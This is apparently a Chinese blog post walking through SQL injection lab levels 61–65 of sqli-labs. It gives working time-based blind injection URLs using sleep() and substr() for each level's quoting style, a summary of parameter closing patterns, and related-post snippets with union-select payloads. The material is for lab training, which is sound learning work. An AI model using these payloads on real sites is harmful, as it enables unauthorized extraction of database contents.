在sqli-liabs学习SQL注入之旅(第六十一关~第六十五关)

已于 2022-05-07 14:41:57 修改
阅读量583 收藏
点赞数 1
分类专栏: 渗透测试 文章标签: 学习
于 2022-05-07 09:44:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guanjian_ci/article/details/124624261
版权

六十一关

这一关和前面几关一样,不过这关使用 双括号+单引号 接受参数。

虽然过关操作一样,但是我们还是要多过几遍,熟能生巧!!!

六十二关

这一关有130次机会,那种注入需要这么多次数呢?没错!延时注入 和 布尔注入。

我们可以简单的判断出这关参数的接受方式是:括号 + 单引号。

我们来判断下数据库的长度:

?id=1') and if(length(database())>9,sleep(5),1)--+          页面多停了5秒,如下图:

?id=1') and if(length(database())>10,sleep(5),1)--+        页面正常缓冲,说明数据库长度为10

其实由前面的关卡我们知道了数据库名为challenges,正好10,说明我们的判断没错!

我们来判断数据库名第一位:

?id=1') and if(substr((select database()),1,1)='e',sleep(5),1) --+         页面正常缓冲

?id=1') and if(substr((select database()),1,1)='c',sleep(5),1) --+         页面多停了5秒

后面的就不搞了,兄弟们!靶场学的是思路,多过几次是为了得心应手。

六十三关

 这一关和六十二关类似,只是这关是单引号接受参数!

我们来判断数据库名第一位:

?id=1' and if(substr((select database()),1,1)='e',sleep(5),1) --+         页面正常缓冲

?id=1' and if(substr((select database()),1,1)='c',sleep(5),1) --+         页面多停了5秒

六十四关

 这一关和六十二关类似,只是这关是双括号接受参数!

我们来判断数据库名第一位:

?id=1)) and if(substr((select database()),1,1)='e',sleep(5),1) --+         页面正常缓冲

?id=1)) and if(substr((select database()),1,1)='c',sleep(5),1) --+         页面多停了5秒

六十五关

 这一关和六十二关类似,只是这关是单括号+双引号接受参数!

我们来判断数据库名第一位:

?id=1") and if(substr((select database()),1,1)='e',sleep(5),1) --+         页面正常缓冲

?id=1") and if(substr((select database()),1,1)='c',sleep(5),1) --+         页面多停了5秒

总结:

(1)在这5关中,我们进一步熟练了SQL注入实战。

(2)过完整个sqliabs65关,我们学到了其中重要的一个点,猜参数的接受方式,我们总结下:

数字型:id = &id

字符型:id = '&id' , id = "&id"

数字型进化:id = (&id)     id = ((&id))

字符型进化:id = ('&id')     id = (('&id'))        id = ("&id")     id = (("&id"))

其他的目前我没遇到过。如果有,大家评论区说下,互相进步!!!

至此,sqliabs六十五关全部通关,申请起飞!

关键_词
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-liabs
weixin_42123571的博客
03-17 680
sqli-liabs 第十一 post型 在username输入'报错 输入'#页面正常 判断闭合为' ’ order by 3#页面错误 ’ order by 2#页面正常 ’ union select 1,2#判断显示位 查库 ' union select database(),2# 查表 ' union select group_concat(table_name),2 fr...
sqli-labs闯小游戏21-65.docx
10-23
这是个sql注入的文档,是sqli-labs闯小游戏二十一到六十五的详解,每一的步骤写得都很详细,前二十的话我已经发布了博客,有需要的可以下载一下。
sql-liabs通6-10
m0_62207170的博客
01-17 191
sql-labs通
sqli-liabs学习SQL注入(第二十一~第三十
guanjian_ci的博客
04-23 3054
二十一 打开这一,开屏暴击。报错的大致意思是时区没有设置好,我们进入报错的文件,在php代码中加入中国时区的代码即可: date_default_timezone_set("PRC"); 其实不改这个也不影响我们做题目,只是有错不改看着难受而已,页面正常后,开始正题: 第一步:在账号密码框一顿输出后,发现注入点不在外面,只能登录进入里面看看,看到了页面显示了我们的UA、cookie等信息。有点类似第二十,属于cookie注入!唯一不同的是这一考察了一个加解密运用,cook.
sql-liabs通11-15
m0_62207170的博客
01-20 114
sql-liabs通11-15
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 知识点 2: PHP 和 Apache 环境安装 要部署 sqli-labs,需要先安装 PHP 和 Apache 环境。安装过程中可能会遇到各种...
sqli-labs-master.zip sql注入学习靶机
最新发布
01-18
sql注入学习靶机,由于github经常挂,这里特提供大家下载。
sqli-lib64笔记学习资料.zip
08-22
sqli-lib64是一个专门设计的在线平台,用于帮助开发者和安全爱好者学习和实践SQL注入技术。这个卡挑战提供了65个不同难度的级别,逐步引导用户了解和掌握SQL注入的各种类型和防御策略。 《sqli-labs-1-65閫氬叧鏁...
sqlilabs过手册注入天书,过sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs》是一本深入探讨SQL注入技术的专业资料,结合了sqli-labs实战平台,旨在帮助读者强化对SQL注入的理解和防御能力。SQL注入是一种常见的网络安全漏洞,攻击者通过在输入数据中嵌入恶意SQL代码...
sqli-liabs学习SQL注入(第十一~第二十
guanjian_ci的博客
04-22 2695
十一 可以看到十一和之前的十是截然不同,偶尔也得换换口味才有新鲜感嘛!话不多说,开搞! 前言:这里有两个提交框,我们应该从哪里注入呢?这并不是困扰我们的问题。我们在实战中应该多方面测试,两个框都测试一下,那个可以就搞那个咯!多搞点不亏的!咳咳咳。 第一步:判断参数接受的类型。 账号:admin' 密码:1111 页面报错 账号:admin' # 密码:1111 登录成功(说明这一存在弱口令,但我们要学习的是SQL注入) 账号:admin .
sqli-labs新手学习笔记(持续更新)
zydbk123456的博客
10-05 455
sqli-labs环境安装 下载地址:https://github.com/Audi-1/sqli-labs 同时需要安装phpstudy 开始前遇到的问题 启动phpstudy,发现apache服务可以正常启动,但MySQL就不行。但是打开任务管理器发现MySQL服务一直在正常运行。查了一下有这种问题原因,可能是因为之前已经安装了MySQL服务,需要在cmd 窗口下输入 sc delete m...
Sqli-labs 1-65的解题记录(做题思路与简要)
CaesarQu的博客
08-13 3657
Sqli-labs的详细解题记录 Less-1: 进入卡内先判断是否存在注入情况,先输入?id =1 and 1=1,发现没有变化,换成and 1=2,依旧没有变化,考虑是为字符型而非整形。用 ’ 进行测试,发现页面报错,出现如下显示,证明可以进行SQL注入。 发现为字符型的后先在后面加一个注释符 --+ 可以发现正常返回数据。 此处可以用 order by 对前面的数据进行排列,先进行试数,发现只有三组数据,'order by 4–+就会超出 然后就可以进行union联合注入 然后就可以获取所有
sql-liabs 20 COOKie 头部注入
qq_41619455的博客
08-27 242
sql 注入练习
SQL注入原理和SQLI-LABS实验环境搭建
wr456wr的博客
03-22 858
SQL注入原理和SQLI-LABS实验环境搭建 文章目录1. sqli-labs实验环境搭建2. 更新kali系统中的火狐浏览器3. 在火狐浏览器中安装hackbar插件4. 熟悉各种闭合方式并通过hackbar插件进行探测5. 熟悉使用hackbar插件,通过order by判断查询字段数熟悉limit的使用熟悉order by的使用 1. sqli-labs实验环境搭建 主机:centos7 ip:192.168.31.128 闭防火墙并设置开机不启动 systemctl stop firewall
SQLi-Labs1~65攻略
Clannad的博客
10-30 8733
文章目录1~10Less-1Less-2Less-3Less-4Less-5Less-6Less-7Less-8Less-9Less-1011~20Less-11Less-12Less-13Less-14Less-15Less-16Less-17Less-18Less-19Less-2021~30Less-21Less-22Less-23Less-24Less-25Less-26Less-27Le...
sqli-liabs学习SQL注入(第一~第十
guanjian_ci的博客
04-20 3935
第一 第一步:判断参数的类型 ?id=1' 页面报错 ?id=1' --+ 页面正常 判断参数接受类型为 字符型 查看第一源码:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 证明我们的判断正确! 第二步:猜解字段 ?id=1' order by 3 --+ 页面正常 ?id=1' order by 4 --+ 页面报错 判断字段长度为 3 第三步:爆数据库名 ?id=-
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2到24SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值